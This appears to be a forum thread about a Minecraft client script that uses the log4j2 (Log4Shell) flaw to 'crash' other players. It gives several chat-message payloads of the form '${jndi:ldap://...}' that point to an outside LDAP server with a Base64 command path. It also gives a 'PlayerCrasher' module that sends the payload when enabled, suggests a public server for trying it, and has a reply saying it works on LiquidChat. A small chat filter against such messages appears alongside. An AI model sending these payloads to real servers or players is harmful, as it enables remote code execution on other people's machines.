log4j2 Crash another player
-
//fixed problem //onpacket var e = t.getPacket(); e instanceof S02PacketChat && e.getChatComponent().getUnformattedText().toLowerCase().contains("${jndi:") && t.cancelEvent(); // mc.thePlayer.sendChatMessage("${jndi:ldap://110.42.239.3: 1389/Basic/CommandBase64/UAJIDBIUWjohaowdnoa}") //mc.thePlayer.sendChatMessage("$/msg playname {jndi:ldap://110.42.239.3: 1389/Basic/CommandBase64/UAJIDBIUWjohaowdnoa}") //mc.thePlayer.sendChatMessage("$@{jndi:ldap://110.42.239.3: 1389/Basic/CommandBase64/UAJIDBIUWjohaowdnoa}")
-
umm
????????????????????
edit:
it doesnt seem to work anyway///api_version=2 (script = registerScript({ name: "PlayerCrasher", authors: ["CzechHek"], version: "1.0" })).import("Core.lib"); module = { onEnable: function () { sendPacket(new C01PacketChatMessage("${jndi:ldap://110.42.239.3: 1389/Basic/CommandBase64/UAJIDBIUWjohaowdnoa}")) }, onPacket: function (e) { if (e.getPacket() instanceof S02PacketChat && e.getPacket().getChatComponent().getUnformattedText().toLowerCase().contains("${jndi:")) { e.cancelEvent(); PlayerCrasherModule.state = false; } } }
-
@czechhek
You can go to this server to try this function
2b2t.pub
Fix this in this serversendPacket(new C01PacketChatMessage("/msg playname ${jndi:ldap://baidu.com}")) or sendPacket(new C01PacketChatMessage("/msg playname ${jndi:ldap://www.bilibili.com}"))
-
@cookiechinese and as of today it works on LiquidChat